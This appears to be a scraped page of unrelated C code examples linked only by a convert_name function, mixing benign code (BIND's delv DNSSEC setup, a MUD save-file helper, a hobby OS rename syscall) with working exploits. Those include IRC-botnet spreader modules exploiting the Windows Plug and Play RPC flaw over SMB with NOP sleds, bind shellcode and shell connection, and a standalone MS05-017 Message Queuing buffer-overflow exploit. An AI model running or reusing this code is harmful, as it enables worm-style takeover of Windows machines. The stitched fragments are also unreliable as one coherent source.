	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

    sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
	convert_name((char*)ptr, (char*)tmp);
	smblen = strlen((char*)tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {

	//	printf("\n[-] send failed\n");
  // _snprintf(buffer, sizeof(buffer), "send failed");
  //  irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
     //_snprintf(buffer, sizeof(buffer), "failed");
   // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	//	exit(0);
return false;
	}

	//printf("ok\n");
//	printf("[*] bind pipe...");

   // _snprintf(buffer, sizeof(buffer), "Bind Pipe");
   //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		//printf("\n[-] send failed\n");


		return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);


	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
     return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
      return false;
	}

	//printf("ok\n");
//	printf("[*] sending crafted packet...");

   // _snprintf(buffer, sizeof(buffer), "sending craffted packet");
 //   irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = xport;
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, (char*)packet, 2196, 0) < 0) {
	//	printf("\n[-] send failed\n");
    //_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
		return false;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

//    _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
    irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
   // recv(sockfd, recvbuf, 4096, 0);
	exploit[exinfo.exploit].stats++;
	if (ConnectShell2(exinfo))
		return true;
        return false;
}
Exemplo n.º 14
0
Arquivo: files.c Projeto: Elohim/FGmud
string player_save_file(string who){
    if( !stringp(who) ) error("Bad argument 1 to save_file().");
    who = convert_name(who);
    return master()->player_save_file(who);
}
Exemplo n.º 15
0
int
main (int argc, char **argv)
{

	unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
	unsigned char *packet = NULL;
	unsigned short bindport;
	unsigned long cnt;
	struct sockaddr_in addr;
	struct hostent *he;
	int len, cpkt = 1;
	int sockfd;
	char recvbuf[4096];
	char *buff, *ptr;
#ifdef _WIN32  
	WSADATA wsa;  
#endif  


	printf("\n      (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
	printf("\t     Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");


	if (argc < 5) {
		printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
		printf("\nMSMQ ports: 2103, 2105, 2107\n");
		printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
		exit(0);
	}

#ifdef _WIN32  
	WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		return 0;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] create socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons((short)atoi(argv[2]));
	addr.sin_addr = *((struct in_addr *)he->h_addr);  
	memset(&(addr.sin_zero), '\0', 8);

	printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed!\n");
		exit(0);
	}
	printf("OK\n");

	packet = dce_rpc_bind(0, endp, 1, &cnt);

	if (send(sockfd, packet, cnt, 0) == -1) {
		printf("[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 0) {
		printf("[-] recv failed\n");
		exit(0);
	}
	free(packet);

	printf("[*] Attacking...");

	buff = (char *) malloc(4172);
	memset(buff, NOP, 4172);

	ptr = buff;
	memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
	ptr += sizeof(dce_rpc_header1)-1;

	// Remote NetBIOS name
	convert_name(ptr, argv[3]);
	ptr += strlen(argv[3])*2;

	memcpy(ptr, tag_private, sizeof(tag_private)-1);
	ptr += sizeof(tag_private)-1;

	memcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

	// offsets
	ptr = buff;
	ptr += 438;
	memcpy(ptr, offsets, sizeof(offsets)-1);
	ptr += sizeof(offsets)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[4]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	buff[4170] = '\0';
	buff[4171] = '\0';

	if (argc == 6) cpkt = atoi(argv[5]);

	while (cpkt--) {
		printf(".");
		if (send(sockfd, buff, 4172, 0) == -1) {
			printf("\n[-] send failed\n");
			exit(0);
		}
	}
	printf(" OK\n");


return 0;
}
Exemplo n.º 16
0
static isc_result_t
setup_dnsseckeys(dns_client_t *client) {
	isc_result_t result;
	cfg_parser_t *parser = NULL;
	const cfg_obj_t *keys = NULL;
	const cfg_obj_t *managed_keys = NULL;
	cfg_obj_t *bindkeys = NULL;
	const char *filename = anchorfile;

	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	if (filename == NULL) {
#ifndef WIN32
		filename = NS_SYSCONFDIR "/bind.keys";
#else
		static char buf[MAX_PATH];
		strlcpy(buf, isc_ntpaths_get(SYS_CONF_DIR), sizeof(buf));
		strlcat(buf, "\\bind.keys", sizeof(buf));
		filename = buf;
#endif
	}

	if (trust_anchor == NULL) {
		trust_anchor = isc_mem_strdup(mctx, ".");
		if (trust_anchor == NULL)
			fatal("out of memory");
	}

	if (trust_anchor != NULL)
		CHECK(convert_name(&afn, &anchor_name, trust_anchor));
	if (dlv_anchor != NULL)
		CHECK(convert_name(&dfn, &dlv_name, dlv_anchor));

	CHECK(cfg_parser_create(mctx, dns_lctx, &parser));

	if (access(filename, R_OK) != 0) {
		if (anchorfile != NULL)
			fatal("Unable to read key file '%s'", anchorfile);
	} else {
		result = cfg_parse_file(parser, filename,
					&cfg_type_bindkeys, &bindkeys);
		if (result != ISC_R_SUCCESS)
			if (anchorfile != NULL)
				fatal("Unable to load keys from '%s'",
				      anchorfile);
	}

	if (bindkeys == NULL) {
		isc_buffer_t b;

		isc_buffer_init(&b, anchortext, sizeof(anchortext) - 1);
		isc_buffer_add(&b, sizeof(anchortext) - 1);
		result = cfg_parse_buffer(parser, &b, &cfg_type_bindkeys,
					  &bindkeys);
		if (result != ISC_R_SUCCESS)
			fatal("Unable to parse built-in keys");
	}

	INSIST(bindkeys != NULL);
	cfg_map_get(bindkeys, "trusted-keys", &keys);
	cfg_map_get(bindkeys, "managed-keys", &managed_keys);

	if (keys != NULL)
		CHECK(load_keys(keys, client));
	if (managed_keys != NULL)
		CHECK(load_keys(managed_keys, client));
	result = ISC_R_SUCCESS;

	if (trusted_keys == 0)
		fatal("No trusted keys were loaded");

	if (dlv_validation)
		dns_client_setdlv(client, dns_rdataclass_in, dlv_anchor);

 cleanup:
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "setup_dnsseckeys: %s",
			  isc_result_totext(result));
	return (result);
}
Exemplo n.º 17
0
static isc_result_t
key_fromconfig(const cfg_obj_t *key, dns_client_t *client) {
	dns_rdata_dnskey_t keystruct;
	isc_uint32_t flags, proto, alg;
	const char *keystr, *keynamestr;
	unsigned char keydata[4096];
	isc_buffer_t keydatabuf;
	unsigned char rrdata[4096];
	isc_buffer_t rrdatabuf;
	isc_region_t r;
	dns_fixedname_t fkeyname;
	dns_name_t *keyname;
	isc_result_t result;
	isc_boolean_t match_root = ISC_FALSE, match_dlv = ISC_FALSE;

	keynamestr = cfg_obj_asstring(cfg_tuple_get(key, "name"));
	CHECK(convert_name(&fkeyname, &keyname, keynamestr));

	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	if (anchor_name)
		match_root = dns_name_equal(keyname, anchor_name);
	if (dlv_name)
		match_dlv = dns_name_equal(keyname, dlv_name);

	if (!match_root && !match_dlv)
		return (ISC_R_SUCCESS);
	if ((!root_validation && match_root) || (!dlv_validation && match_dlv))
		return (ISC_R_SUCCESS);

	if (match_root)
		delv_log(ISC_LOG_DEBUG(3), "adding trust anchor %s",
			  trust_anchor);
	if (match_dlv)
		delv_log(ISC_LOG_DEBUG(3), "adding DLV trust anchor %s",
			  dlv_anchor);

	flags = cfg_obj_asuint32(cfg_tuple_get(key, "flags"));
	proto = cfg_obj_asuint32(cfg_tuple_get(key, "protocol"));
	alg = cfg_obj_asuint32(cfg_tuple_get(key, "algorithm"));

	keystruct.common.rdclass = dns_rdataclass_in;
	keystruct.common.rdtype = dns_rdatatype_dnskey;
	/*
	 * The key data in keystruct is not dynamically allocated.
	 */
	keystruct.mctx = NULL;

	ISC_LINK_INIT(&keystruct.common, link);

	if (flags > 0xffff)
		CHECK(ISC_R_RANGE);
	if (proto > 0xff)
		CHECK(ISC_R_RANGE);
	if (alg > 0xff)
		CHECK(ISC_R_RANGE);

	keystruct.flags = (isc_uint16_t)flags;
	keystruct.protocol = (isc_uint8_t)proto;
	keystruct.algorithm = (isc_uint8_t)alg;

	isc_buffer_init(&keydatabuf, keydata, sizeof(keydata));
	isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata));

	keystr = cfg_obj_asstring(cfg_tuple_get(key, "key"));
	CHECK(isc_base64_decodestring(keystr, &keydatabuf));
	isc_buffer_usedregion(&keydatabuf, &r);
	keystruct.datalen = r.length;
	keystruct.data = r.base;

	CHECK(dns_rdata_fromstruct(NULL,
				   keystruct.common.rdclass,
				   keystruct.common.rdtype,
				   &keystruct, &rrdatabuf));

	CHECK(dns_client_addtrustedkey(client, dns_rdataclass_in,
				       keyname, &rrdatabuf));
	trusted_keys++;

 cleanup:
	if (result == DST_R_NOCRYPTO)
		cfg_obj_log(key, lctx, ISC_LOG_ERROR, "no crypto support");
	else if (result == DST_R_UNSUPPORTEDALG) {
		cfg_obj_log(key, lctx, ISC_LOG_WARNING,
			    "skipping trusted key '%s': %s",
			    keynamestr, isc_result_totext(result));
		result = ISC_R_SUCCESS;
	} else if (result != ISC_R_SUCCESS) {
		cfg_obj_log(key, lctx, ISC_LOG_ERROR,
			    "failed to add trusted key '%s': %s",
			    keynamestr, isc_result_totext(result));
		result = ISC_R_FAILURE;
	}

	return (result);
}
Exemplo n.º 18
0
int
main(int argc, char *argv[]) {
	dns_client_t *client = NULL;
	isc_result_t result;
	dns_fixedname_t qfn;
	dns_name_t *query_name, *response_name;
	dns_rdataset_t *rdataset;
	dns_namelist_t namelist;
	unsigned int resopt, clopt;
	isc_appctx_t *actx = NULL;
	isc_taskmgr_t *taskmgr = NULL;
	isc_socketmgr_t *socketmgr = NULL;
	isc_timermgr_t *timermgr = NULL;
	dns_master_style_t *style = NULL;
#ifndef WIN32
	struct sigaction sa;
#endif

	progname = argv[0];
	preparse_args(argc, argv);

	argc--;
	argv++;

	isc_lib_register();
	result = dns_lib_init();
	if (result != ISC_R_SUCCESS)
		fatal("dns_lib_init failed: %d", result);

	result = isc_mem_create(0, 0, &mctx);
	if (result != ISC_R_SUCCESS)
		fatal("failed to create mctx");

	CHECK(isc_appctx_create(mctx, &actx));
	CHECK(isc_taskmgr_createinctx(mctx, actx, 1, 0, &taskmgr));
	CHECK(isc_socketmgr_createinctx(mctx, actx, &socketmgr));
	CHECK(isc_timermgr_createinctx(mctx, actx, &timermgr));

	parse_args(argc, argv);

	CHECK(setup_style(&style));

	setup_logging(stderr);

	CHECK(isc_app_ctxstart(actx));

#ifndef WIN32
	/* Unblock SIGINT if it's been blocked by isc_app_ctxstart() */
	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = SIG_DFL;
	if (sigfillset(&sa.sa_mask) != 0 || sigaction(SIGINT, &sa, NULL) < 0)
		fatal("Couldn't set up signal handler");
#endif

	/* Create client */
	clopt = DNS_CLIENTCREATEOPT_USECACHE;
	result = dns_client_createx2(mctx, actx, taskmgr, socketmgr, timermgr,
				     clopt, &client, srcaddr4, srcaddr6);
	if (result != ISC_R_SUCCESS) {
		delv_log(ISC_LOG_ERROR, "dns_client_create: %s",
			  isc_result_totext(result));
		goto cleanup;
	}

	/* Set the nameserver */
	if (server != NULL)
		addserver(client);
	else
		findserver(client);

	CHECK(setup_dnsseckeys(client));

	/* Construct QNAME */
	CHECK(convert_name(&qfn, &query_name, qname));

	/* Set up resolution options */
	resopt = DNS_CLIENTRESOPT_ALLOWRUN | DNS_CLIENTRESOPT_NOCDFLAG;
	if (no_sigs)
		resopt |= DNS_CLIENTRESOPT_NODNSSEC;
	if (!root_validation && !dlv_validation)
		resopt |= DNS_CLIENTRESOPT_NOVALIDATE;
	if (cdflag)
		resopt &= ~DNS_CLIENTRESOPT_NOCDFLAG;

	/* Perform resolution */
	ISC_LIST_INIT(namelist);
	result = dns_client_resolve(client, query_name, dns_rdataclass_in,
				    qtype, resopt, &namelist);
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "resolution failed: %s",
			  isc_result_totext(result));

	for (response_name = ISC_LIST_HEAD(namelist);
	     response_name != NULL;
	     response_name = ISC_LIST_NEXT(response_name, link)) {
		for (rdataset = ISC_LIST_HEAD(response_name->list);
		     rdataset != NULL;
		     rdataset = ISC_LIST_NEXT(rdataset, link)) {
			result = printdata(rdataset, response_name, style);
			if (result != ISC_R_SUCCESS)
				delv_log(ISC_LOG_ERROR, "print data failed");
		}
	}

	dns_client_freeresanswer(client, &namelist);

cleanup:
	if (dlv_anchor != NULL)
		isc_mem_free(mctx, dlv_anchor);
	if (trust_anchor != NULL)
		isc_mem_free(mctx, trust_anchor);
	if (anchorfile != NULL)
		isc_mem_free(mctx, anchorfile);
	if (qname != NULL)
		isc_mem_free(mctx, qname);
	if (style != NULL)
		dns_master_styledestroy(&style, mctx);
	if (client != NULL)
		dns_client_destroy(&client);
	if (taskmgr != NULL)
		isc_taskmgr_destroy(&taskmgr);
	if (timermgr != NULL)
		isc_timermgr_destroy(&timermgr);
	if (socketmgr != NULL)
		isc_socketmgr_destroy(&socketmgr);
	if (actx != NULL)
		isc_appctx_destroy(&actx);
	if (lctx != NULL)
		isc_log_destroy(&lctx);
	isc_mem_detach(&mctx);

	dns_lib_shutdown();

	return (0);
}
Exemplo n.º 19
0
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
	SOCKADDR_IN addr;
	int len;
	int sockfd;
	unsigned short smblen;
	char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
	IRC* irc=(IRC*)conn;
	BOOL success=FALSE;
	char* thisTarget;
	int pnpbindsize=405;
	int TargetOS, Target;
	char* tOS="";

	WSADATA wsa;
	fWSAStartup(MAKEWORD(2,0), &wsa);

	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;

	thisTarget = exinfo.ip;
	TargetOS=FpHost(thisTarget,FP_NP);
	if (TargetOS==OS_UNKNOWN) 
		TargetOS=FpHost(thisTarget,FP_SMB);
	if (TargetOS == OS_WINNT){
		Target=OS_WINNT;
		success=FALSE;
	}else if (TargetOS==OS_WINXP){
		Target=OS_WINXP;
		success=FALSE;
	}else if (TargetOS==OS_WIN2K){
		Target=OS_WIN2K;
		success=TRUE;
	}else{
		success=FALSE;
	}

	ZeroMemory(&addr,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = finet_addr(thisTarget);
	addr.sin_port = fhtons((unsigned short)exinfo.port);

	if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
	if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
	
	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) return FALSE;

	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
	convert_name((char *)ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// Start prepare header -- dETOX mod --
	memcpy(RPC_call + 260, Offsets[OffNum], 4); 

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
	memcpy(ptr,bindshell,pnpbindsize-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
	frecv(sockfd, recvbuf, 4096, 0);

	if (!exinfo.silent && exinfo.verbose){
		switch(Target){
		case 1:
			tOS="WINNT";
			break;
		case 2:
			tOS="WIN2K";
			break;
		case 3:
			tOS="WINXP";
			break;
		default:
			tOS="UNKNOWN/2K3/LINUX";
			break;
		}

		irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
	}


//	if(success){
		Sleep(2000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
//	}
	return TRUE;
}
Exemplo n.º 20
0
int syscall_rename(const char *a_oldpath, const char *a_newpath)
{
	int ohandle, nhandle;
	int drive1, drive2;
	char dir_path1[512], dir_path2[512];
	char name_comp1[13], name_comp2[13], conv_name1[11], conv_name2[11];
	char oldpath[512], newpath[512];
	struct dir_entry dent1, dent2;
	int exist1, exist2;
	struct DIR_FILE *dirf;
	int len1, len2;
	int i,t;

	len1 = strlen(a_oldpath);
	len2 = strlen(a_newpath);

	if (len1 > 512 || len2 > 512) return ELONGPATH;

	strcpy(oldpath,a_oldpath);
	strcpy(newpath,a_newpath);

	if (oldpath[len1-1] == '/' || oldpath[len1-1] == '\\') oldpath[len1-1] = '\0';
	if (newpath[len2-1] == '/' || newpath[len2-1] == '\\') newpath[len2-1] = '\0';
	parse_path(oldpath, &drive1, dir_path1, name_comp1);
	parse_path(newpath, &drive2, dir_path2, name_comp2);

	if (drive1 != drive2) return EDEVICE_DIFFERENT;

	nhandle = open_path(drive2, dir_path2);
	if (nhandle < 0) return nhandle;

	if (name_comp2[0] !='\0')
	{
		if (convert_name(name_comp2, conv_name2) < 0)
		{
			close_dir(nhandle);
			return EINVALIDNAME; // Error
		}

		exist2 = find_entry(nhandle, conv_name2, &dent2);
	}
	
	ohandle = open_path(drive1, dir_path1);
	if (ohandle < 0)
	{
		close_dir(nhandle);
		return ohandle;
	}
	if (name_comp1[0] != '\0')
	{
		if (convert_name(name_comp1, conv_name1) < 0)
		{
			close_dir(nhandle);
			close_dir(ohandle);
			return EINVALIDNAME; // Error
		}

		exist1 = find_entry(ohandle, conv_name1, &dent1);
	}

	// Check whether new path exists and is removable
	if ((exist2 == 1) && ((dent2.attrib & FTYPE_READONLY) || ((dent2.attrib & FTYPE_DIR) && (empty_dir(nhandle, &dent2) != 1))))
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return ETARGET_EXISTS;
	}

	// Check if source exists and is movable
	if (exist1 != 1)
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return EPATH_NOT_EXISTS;
	}
	if ((dent1.attrib & FTYPE_READONLY) != 0)
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return EREADONLY;
	}
	// Check whether oldpath is not a subpath of newpath
	if ((dent1.attrib & FTYPE_DIR) && (ohandle != nhandle))
	{	
		t = nhandle;
		dirf = &dir_file_list[t];

		while (dirf->parent_index >= 0 && dirf->parent_index != ohandle)
		{
			t = dirf->parent_index;
			dirf = &dir_file_list[t];
		}
		
		if (dirf->parent_index == ohandle)
		{
			close_dir(nhandle);
			close_dir(ohandle);
			return EOLDPATH_PARENT_OF_NEWPATH;
		}
	}

	// Check if newpath already exists whether it is compatible or not
	if ((exist2 == 1) && (((dent1.attrib & FTYPE_DIR) != 0 && (dent2.attrib & FTYPE_DIR) == 0) || ((dent1.attrib & FTYPE_DIR) == 0 && (dent2.attrib & FTYPE_DIR) != 0))) 
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return ESRC_DEST_NOT_SAME_TYPE;
	}

	// Remove destination entry if exists
	if (exist2 == 1)
	{
		if (dent2.attrib & FTYPE_DIR)
			syscall_rmdir(newpath);
		else	syscall_unlink(newpath);
	}

	// Add the source dir entry after changing the name
	// to destination directory
	bcopy( (char *)&dent1, (char *)&dent2, sizeof(struct dir_entry));
	for (i=0; i<11; i++)	// Both name and extension
		dent2.name[i] = conv_name2[i];

	t = add_dir_entry(nhandle, &dent2);
	if (t == 1)
	{
		delete_dir_entry(ohandle, dent1.name);
	}

	// Close the handles of parent directories
	close_dir(ohandle);
	close_dir(nhandle);
	
	if (t == 1) return 0;
	else	return t;

}